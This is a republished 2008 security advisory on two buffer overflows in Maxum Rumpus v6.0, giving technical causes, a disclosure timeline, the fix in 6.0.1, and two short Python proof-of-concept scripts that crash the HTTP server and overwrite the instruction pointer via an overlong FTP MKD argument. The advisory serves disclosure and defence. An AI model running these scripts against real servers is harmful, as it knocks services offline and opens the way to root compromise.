Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:20936
HistoryDec 02, 2008 - 12:00 a.m.

[BMSA 2008-09] Two buffer overflow vulnerabilities in Rumpus v6.0

2008-12-0200:00:00
vulners.com
26
JSON

BLUE MOON SECURITY ADVISORY 2008-09

:Title: Two buffer overflows in Maxum Rumpus
:Severity: Critical
:Reporter: Blue Moon Consulting
:Products: Maxum Rumpus v6.0
:Fixed in: 6.0.1

Description

Rumpus turns any Mac into a file transfer server.

Rumpus v6.0 contains two buffer overflow vulnerabilities in its HTTP and FTP modules. The first
allows an unauthenticated user to crash Rumpus. The later may result in arbitrary code execution
under superuser privilege.

The overflow in HTTP component is caused by the lack of boundary check when parsing for HTTP
action verb (GET, POST, PUT, etc.). If the verb is exactly 2908-byte long, the server runs into a
segmentation fault and crashes. A manual restart is required. It has been observed that this
problem occurs at other verb lengths too. The vulnerability is rated at moderate severity for the
lost of service.

The overflow in FTP component is also caused by the lack of length check when parsing FTP commands
that take argument such as ``MKD``, ``XMKD``, ``RMD`` and so on. The overflow occurs when the
argument is ``strcpy`` to an internal buffer. This buffer is 1024-byte long. When the passed-in
argument is longer than 1046 bytes, the instruction pointer will be overwritten. This allows a
successful attack to run arbitrary code under the privilege of a superuser (root) by default.
Though authorization is required to exploit this security bug, the vulnerability is rated at
critical severity because the FTP daemon could be allowing anonymous access.

Workaround

There is no workaround the first bug.

Disable ANONYMOUS and only allow trusted users to use FTP.

Fix

Maxum has released Rumpus v6.0.1 which addressed these bugs.

Disclosure

Blue Moon Consulting adapts `RFPolicy v2.0 <http://www.wiretrip.net/rfp/policy.html&gt;&#96;_ in
notifying vendors.

:Initial vendor contact:

November 28, 2008: Initial contact sent to [email protected]

:Vendor response:

November 28, 2008: John requested further communications to be sent to the same address.

:Further communication:

November 28, 2008: Technical details and request for regular update of a patch sent to the
vendor.

November 29, 2008: Vendor thanked for the bug report and planned to release v6.0.1 on Monday,
December 01.

December 01, 2008: Vendor released 6.0.1 and posted release note at
http://www.maxum.com/Rumpus/News601.html.

:Public disclosure: December 01, 2008

:Exploit code:

For the vulnerability in HTTP component::

from socket import socket, AF_INET, SOCK_STREAM

host = "192.168.1.12"
port = 80

s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
s.send('z' * 2908 + '\n\n')
s.recv(1024)
s.close()

For the vulnerability in FTP component::

from socket import socket, AF_INET, SOCK_STREAM

host = "192.168.1.12"
port = 21
user = "regular"
pass_ = "training"

commands = [
'user regular\n',
'pass training\n',
'mkd ' + 'z' * 1046 + 'abcd\n'
]

s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
s.recv(1024)
for line in commands:
s.send(line)
s.recv(1024)
s.close()

Disclaimer

The information provided in this advisory is provided "as is" without warranty of any kind. Blue
Moon Consulting Co., Ltd disclaims all warranties, either express or implied, including the
warranties of merchantability and fitness for a particular purpose. Your use of the information on
the advisory or materials linked from the advisory is at your own risk. Blue Moon Consulting Co.,
Ltd reserves the right to change or update this notice at any time.

JSON